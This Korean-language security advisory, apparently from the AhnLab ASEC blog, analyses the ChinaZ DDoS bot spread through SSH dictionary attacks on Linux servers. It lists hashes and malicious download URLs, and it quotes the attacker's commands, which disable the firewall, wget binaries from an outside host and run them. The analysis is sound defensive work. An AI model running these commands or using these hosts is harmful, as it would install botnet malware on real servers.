리눅스 SSH 서버를 대상으로 유포 중인 ChinaZ DDoS Bot 악성코드

IOC:
c69f5eb555cc10f050375353c205d5fa
http://45.113.163.219:29134
http://45.113.163.219/win32
http://www.911ddos.com:10912
45.113.163.219
http://45.113.163.219/linux64
2ec7348e6b6b32d50a01c3ffe480ef70
http://45.113.163.219
http://45.113.163.219/linux32
c9eb0815129c135db5bbb8ac79686b9a

요약:
서비스를

내용:
AhnLab Security Emergency response Center(ASEC)에서는 최근 부적절하게 관리되고 있는 리눅스 SSH 서버를 대상으로 ChinaZ DDoS Bot 악성코드들이 설치되고 있는 것을 확인하였다. ChinaZ 그룹은 2014년 경부터 확인된 중국의 공격 그룹 중 하나로서 윈도우 및 리눅스 시스템들을 대상으로 다양한 DDoS Bot들을 설치하고 있다. [1] ChinaZ 공격 그룹이 제작한 것으로 알려진 DDoS Bot 악성코드들로는 대표적으로 XorDDoS, AESDDos, BillGates, MrBlack 등이 있으며 여기에서는 ChinaZ 또는 ChinaZ DDoSClient라고 불리는 DDoS Bot을 다룬다.
1. 리눅스 SSH 서버 대상 공격 캠페인
일반 사용자들의 주요 작업 환경인 데스크탑과 달리 서버는 주로 특정 서비스를 제공하는 역할을 담당한다. 이에 따라 데스크탑 환경에서는 악성코드가 주로 웹 브라우저를 통해 또는 메일 첨부 파일을 통해 이루어지며 공격자들 또한 악성코드 설치를 유도하기 위해 정상 프로그램으로 위장하여 악성코드를 유포한다. 서버 환경을 대상으로 하는 공격자들은 이러한 방식으로 악성코드를 유포하는 데 한계가 존재하기 때문에 다른 방식을 사용한다. 대표적으로 부적절하게 관리되고 있거나 최신 버전으로 패치를 하지 않아 취약점 공격에 취약한 서비스들이 그 대상이 된다.
부적절하게 관리되고 있는 서비스로는 대표적으로 단순한 형태의 계정 정보를 사용함에 따라 사전 공격에 취약한 유형이 있다. 예를 들어 윈도우 운영체제를 대상으로 하는 주요 공격 벡터 중 하나인 Remote Desktop Protocol(RDP) 및 MS-SQL 서비스가 대표적이다. 리눅스 서버 환경에서는 주로 Secure Shell(SSH) 서비스가 공격 대상이 되며, 오래된 리눅스 서버 또는 임베디드 리눅스 운영체제가 설치된 IoT 환경에서는 Telnet 서비스가 사전 공격 대상이 되기도 한다.
현재 블로그에서 다룰 ChinaZ 공격 그룹의 ChinaZ DDoSClient는 공격자가 스캐너 및 SSH BruteForce 악성코드들을 이용해 획득한 계정 정보를 이용해 설치된 것으로 추정된다. 공격자는 22번 포트 즉 SSH 서비스가 동작하는 시스템들을 스캐닝 한 후 SSH 서비스가 동작 중인 시스템을 찾은 이후에는 흔히 사용되는 SSH 계정 정보를 이용해 사전 공격을 진행하였다.
User Password 공격지 root – 45.113.163[.]219 Table 1. ChinaZ 그룹이 공격에 사용한 계정 정보
ChinaZ를 설치한 공격자는 로그인 이후 다음과 같은 명령들을 이용해 ChinaZ를 리눅스 서버에 설치하였다. 참고로 SSH 서버에 로그인한 공격지의 주소와 ChinaZ를 다운로드하는 주소는 동일하다. # service iptables stop # wget hxxp://45.113.163[.]219/linux64 # nohup /root/linux64 > /dev/null 2>&1 & # chmod 777 linux64 # ./linux64 # chmod 0755 /root/linux64 # nohup /root/linux64 > /dev/null 2>&1 & # chmod 0777 linux64 # chmod u+x linux64 # ./linux64 & # chmod u+x linux64 # ./linux64 & # cd /tmp # service iptables stop # wget hxxp://45.113.163[.]219/linux32 # nohup /root/linux32 > /dev/null 2>&1 & # chmod 777 linux32 # ./164 # chmod 0755 /root/linux32 # nohup /root/linux32 > /dev/null 2>&1 & # chmod 0777 linux32 # chmod u+x linux32 # ./linux32 & # chmod u+x dos6cc4 # ./linux32 & # cd /tmp #.....

Open New Windows

리눅스 SSH 서버를 대상으로 유포 중인 ChinaZ DDoS Bot 악성코드 - ASEC BLOG:
https://asec.ahnlab.com/ko/49845/